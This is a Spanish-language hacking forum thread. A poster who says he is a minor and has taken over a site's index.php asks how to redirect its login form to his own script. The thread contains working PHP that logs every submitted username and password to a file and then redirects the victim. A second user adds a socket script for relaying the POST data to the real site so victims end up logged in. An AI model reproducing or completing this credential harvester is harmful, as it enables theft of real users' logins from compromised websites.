Autor
|
Tema: duda sobre pishing.php (Leído 5,467 veces)
|
.:UND3R:.
|
Hola a todos bueno les cuento tengo una duda lo que pasa es que logre tomar el control de un index.php y quiero editar el <form method="post" ACTION= datos.phpel codigo de datos.php pienso ponerle esto: <?php header ('Location: http://www.web.com/ '); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> pero si ago lo anterior ningun usuario podria autentificarse ya que solamente guardaria los datos y despues lo redireccionaria a otra web me gustaria que redireccionara autentificado,existe alguna manera para que se guarden los datos del form o que se intercepten y que despues se logue? si me pudieran explicar un poquito se los agradeceria demasiado desde ya gracias
|
|
« Última modificación: 4 Marzo 2010, 19:14 pm por bikutoru123 »
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
Desconectado
Mensajes: 5.110
|
Pon esto al final: header ('Location: http://www.web.com/ ');
|
|
|
En línea
|
|
|
|
.:UND3R:.
|
No lo logre :/ me redirecciona a la pagina pero no logueado este es una parte del form de la pagina <form action='' method='post' name='login_account' id='login_account'> se podria poner 2 action cosa que pase por el mio (dato.php) y despues por el normal de la web? gracias
|
|
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
luiggy2
Desconectado
Mensajes: 439
¡ Hello word ! XD
|
Si, mirate este código para enviar datos por post a otra web: <? $host="www.tupagina.com"; $referer="http://referer.com"; $uri="/pagina.php"; $vars="¶metro1=valor1¶metro2=valor2"; $header = "Host: $host\r\n"; $header .= "User-Agent: Mosaic\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header.="Referer: $referer\r\n"; $header .= "Content-Length: ".strlen($vars)."\r\n"; $header.="Pragma: no-cache\r\n"; $header .= "Connection: close\r\n\r\n"; $fp = pfsockopen("tcp://".$host, 80, $errno, $errstr, 20); fputs($fp, "POST $uri HTTP/1.1\r\n"); fputs($fp, $header.$vars); echo fgets($fp, 128)."<br>"; } ?>
fuente:http://pastebin.com/f7f667268 Saludos!
|
|
|
En línea
|
" Las grandes ideas suelen salir la mayoría de veces de grandes estupideces "
|
|
|
.:UND3R:.
|
:B soy un poco nulo con esto de php osea el codigo que me mandaste en el index ¿lo pongo asi? <form method="post" ACTION=codigo.phpy en el codigo.php pongo el codigo que me enviaste _____________________________________0 $referer="http://referer.com"; $uri="/pagina.php"; esta es la ruta de la pagina web original? en que lugar de mi pagina queda guardado los datos? muchas gracias por tu ayuda
|
|
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
Shell Root
|
Sabes programar, PHP?
|
|
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
.:UND3R:.
|
no,soy pequeño de echo todavia no soy mayor de edad,pretendo estudiarlo en la universidad,porfavor una ayuda hice esto: <?php $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); header ('Location: http://fantazymu.web.id/index.php/ '); exit; ?> pero todavia no logro entrar como autentificado el form de la pagina es este: <form action='' method='post' name='login_account' id='login_account'> <table width='166' border='0' cellspacing='0' cellpadding='0'> <tr> <td height='16' colspan='2' class='text_login' scope='row' align='left'>Username</td> </tr> <tr> <th height='16' colspan='2' scope='row'><div align='left'> <input name='login' type='text' class='login_field' id='login' title='Username' size='15' maxlength='10'>
<input name='account_login' type='hidden' id='account_login' value='account_login'> </div></th> </tr> <tr> <td height='16' colspan='2' class='text_login' scope='row' align='left'>Password</td> </tr> <tr> <th colspan='2' scope='row'><div align='left'>
<input name='pass' type='password' class='login_field' id='pass' title='Password' size='15' maxlength='10'> </div></th> </tr> <tr> <th width='62' height='33' scope='row'><div align='left'> <input name='Submit' type='submit' class='button' value='Login!' title='Login'> </div></th> <td width='104' scope='row'><div align='left' title='Lost Password' class='link_menu'><a href='http:/uyquelindaweb/index.php?op=lostpassword'>Lost Password </a></div></td>
</tr> </table> </form> lo que ago es cambiar <form action='' method='post' name='login_account' id='login_account'> por esto <FORM METHOD="post" ACTION="datos.php"> claro guarda los datos pero al momento de redireccionar al index no esta autentificada
|
|
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
Nakp
casi es
Ex-Staff
Desconectado
Mensajes: 6.336
he vuelto :)
|
|
|
|
En línea
|
Ojo por ojo, y el mundo acabará ciego.
|
|
|
WHK
|
no puedes hacer eso, tienes que autentificar sesiones con las cookies, enviar y recibir headers o hacer un bouncer.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Pishing Web (Advertencia: Posible sitio de phishing.)
Desarrollo Web
|
MeCraniDOS
|
5
|
4,271
|
7 Enero 2013, 12:44 pm
por Novlucker
|
|
|
BACKTRACK 5 R3 PISHING
Hacking
|
ZuriaHack
|
0
|
2,137
|
11 Julio 2013, 15:09 pm
por ZuriaHack
|
|
|
Hacking basico - consulta sobre pishing, las pass no se guardan
Hacking
|
noquiero
|
1
|
2,749
|
22 Abril 2015, 15:19 pm
por Pablo Videla
|
|
|
Duda:Pishing + True Login
Hacking
|
Rusty_125
|
0
|
1,482
|
3 Febrero 2019, 19:04 pm
por Rusty_125
|
|
|
FACEBOOK PISHING
Seguridad
|
VictorT
|
2
|
2,892
|
15 Julio 2019, 23:27 pm
por MCKSys Argentina
|
|